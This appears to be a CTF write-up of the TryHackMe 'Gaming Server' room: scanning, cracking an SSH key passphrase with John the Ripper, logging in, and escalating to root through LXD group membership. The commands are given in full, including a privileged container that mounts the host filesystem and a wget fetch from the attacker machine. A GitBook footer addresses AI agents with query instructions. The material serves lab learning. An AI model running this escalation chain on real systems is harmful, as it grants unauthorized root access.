> For the complete documentation index, see [llms.txt](https://dhaval-kotak.gitbook.io/ctfs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dhaval-kotak.gitbook.io/ctfs/gaming-server.md).

# Gaming Server

**Date:** 11 November, 2021

**Author:** Dhaval Kotak

Room: [Gaming Server](https://tryhackme.com/room/gamingserver)

## Port Scanning

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ nmap 10.10.19.112 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 22:21 IST
Nmap scan report for 10.10.19.112
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds
```

## Gobuster Scanning

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ gobuster dir -u http://10.10.19.112 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.19.112
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/11 22:22:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 2762]
/robots.txt           (Status: 200) [Size: 33]  
/secret               (Status: 301) [Size: 313] [--> http://10.10.19.112/secret/]
/server-status        (Status: 403) [Size: 277]                                  
/uploads              (Status: 301) [Size: 314] [--> http://10.10.19.112/uploads/]
           
===============================================================
2021/11/11 22:24:36 Finished
===============================================================
```

## Getting SSH Credentials

### Username

* We find the username john in the page source

### RSA Key

* There is a RSA key in the secret directory we discovered by gobuster.
* We can use ssh2John and then JohnTheRipper itself to get the passphrase for getting the ssh login.

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ python /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/gaming_server
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (id_rsa)
1g 0:00:00:06 71.47% (ETA: 22:29:46) 0.1658g/s 1697Kp/s 1697Kc/s 1697KC/s alfaris
Session aborted
```

## SSH Login

* Now we can log in as john using ssh credentials we found.
* And we get the user.txt right away

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ ssh john@10.10.19.112 -i id_rsa                      
The authenticity of host '10.10.19.112 (10.10.19.112)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.112' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 11 17:05:39 UTC 2021

  System load:  0.0               Processes:           97
  Usage of /:   41.1% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.19.112
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt 
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e
```

* **What is the user flag?**

  a5c2ff8b9c(REDACTED)ff2f1a5a6e7e

## Privilege Escalation

Our uid is a member of lxd group which is a linux container.

```shell
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip
),46(plugdev),108(lxd)
```

We can download alphine builder on our local machine, which provides a way to create Alpine Linux images, so we can mount it using LXD.

* First clone the repository in your machine and then run the alpine builder script as root in order to build the image as a tar file

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 42 (delta 5), reused 4 (delta 1), pack-reused 27
Receiving objects: 100% (42/42), 3.11 MiB | 650.00 KiB/s, done.
Resolving deltas: 100% (11/11), done.
nanomite @ zeus in ~/thm/gaming_server
⚡️ cd lxd-alpine-builder 
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master
⚡️ sudo ./build-alpine 
```

Now start a server to transfer the files from your attacker machine to the target machine

```shell
// Your Machine
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master*
⚡️ python3 -m http.server 5000                          
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
```

```
// Target Machine
john@exploitable:~$ wget 10.17.14.25:5000/alpine-v3.13-x86_64-20210218_0139.tar.gz/
```

Now import the image

```bash
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
```

Then spawn the root shell by running the following commands:

```bash
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
```

After that we can find the root flag and read it.

* **What is the root flag?**

  2e337b8c9f(REDACTED)8d4e6a7c88fc


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://dhaval-kotak.gitbook.io/ctfs/gaming-server.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
